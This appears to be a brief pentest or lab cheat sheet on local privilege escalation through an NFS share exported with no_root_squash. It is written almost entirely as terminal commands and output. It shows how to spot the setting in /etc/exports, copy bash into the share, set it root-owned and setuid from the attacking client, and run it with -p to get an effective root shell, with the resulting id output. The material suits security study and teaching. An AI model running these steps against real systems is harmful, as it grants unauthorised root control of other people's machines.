NFS (no_root_squash)

NFS (Local Privilege Escalation)

Detect

low@lower3:/$ cat /etc/exports                                                                                             
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)

Abuse

Victim

low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .

Attacker

❯ chown root:root bash
❯ chmod 4755 bash

Victim

low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)